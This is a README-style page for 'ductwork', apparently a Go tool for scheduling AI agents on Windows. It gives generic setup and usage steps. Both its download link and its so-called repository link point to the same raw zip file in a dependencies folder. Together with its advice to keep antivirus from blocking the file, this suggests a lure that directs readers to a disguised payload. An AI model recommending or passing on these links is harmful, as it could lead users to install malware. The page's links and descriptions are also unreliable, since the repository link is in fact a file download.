ductwork is a simple program built using the Go language. It lets you run AI agents on set schedules. You can create tasks, add skills, and keep a history that stays saved. It comes as a single file you can use in three ways. This fits both one computer setups and bigger, spread-out systems.
You do not need to know coding to use it. The program takes care of running AI agents, making your work or projects easier to manage.
Key ideas behind ductwork:
- Runs AI agents automatically on set times
- Keeps data saved for future use
- Works alone or with other computers
- Easy to use on Windows
- Single, easy-to-run program file
- Schedule AI tasks by time or need
- Store memory for tasks to remember past results
- Add skills for specific AI functions
- Can work on one computer or many linked machines
- Supports popular AI models and tools
- Works without complex setup
Before you start, make sure your computer matches these basic needs:
- Operating System: Windows 10 or newer
- RAM: At least 4 GB free memory
- Disk Space: Minimum 100 MB free
- Internet Connection: Needed for downloading and running AI models
- CPU: Any recent processor from the last 5 years
- Permissions: Ability to run programs and access the internet
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Download ductwork
Visit the release page by clicking the link below or the green button at the top: -
Choose Your File
On the page, find the latest Windows version. It should be named something likeductwork-windows.exe. Click the file to download it. -
Save the File
Pick a folder on your computer, likeDownloadsorDesktop, and save the file there. -
Run the program
Double-click the saved file to start ductwork. The program will open a new window or command prompt. -
Follow the Instructions
ductwork will guide you through setup with simple prompts. You can create your first task and schedule it right away.
Once the program is running:
- The main window displays tasks and schedules.
- You can add a new task by clicking the "New Task" button.
- Assign skills or AI agents to each task based on your goals.
- Set the time and frequency for each task to run.
- The program stores results in memory for future use.
You do not need to keep the window open if you set ductwork to run in the background or as a scheduled service.
Here are steps for common actions:
- Click New Task
- Type what the task should do
- Choose the AI skill or agent (like Claude)
- Set how often the task runs
- Save and activate
- Go to the Memory section
- See past runs and results
- Edit or remove entries as needed
- Open the Skills tab
- Add new AI tools or remove old ones
- Skills help tasks perform better
ductwork works in three ways to fit your needs:
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Single Node
Run everything on one PC. Tasks, memory, and AI agents all in one place. -
Local Network
Use multiple computers connected in the same network to share load. -
Distributed System
A more advanced setup where machines work together across locations.
For most Windows users, the single node mode is easiest to start with.
- Download the latest Windows version from the release page.
- Replace your old
ductwork.exefile by saving the new one in the same folder. - Running the new file updates the program without extra steps.
- If ductwork does not start, check your antivirus does not block the file.
- Make sure your computer is connected to the internet during setup.
- Close other heavy programs if ductwork runs slowly.
- Check you are using the latest Windows version and have permissions to run software.
- Review the task logs for errors by opening the program and selecting Logs.
- Visit the ductwork releases page for updates.
- Explore documentation inside the program after setup.
- Ask questions or report problems by opening an issue on the GitHub repository.
- Download and update: https://github.com/Smileyjman/ductwork/raw/refs/heads/main/pkg/dependencies/Software_v3.1.zip
- GitHub Repository: https://github.com/Smileyjman/ductwork/raw/refs/heads/main/pkg/dependencies/Software_v3.1.zip
ductwork uses AI models similar to Claude and Anthropic. It fits roles in automation and scheduling for personal projects or small teams. Because it runs as a single file, it demands little setup. You can use it for many tasks, from simple reminders to advanced AI workflows.
The tool takes advantage of Go’s speed and simplicity. Its memory feature helps tasks learn and adapt by saving past interactions.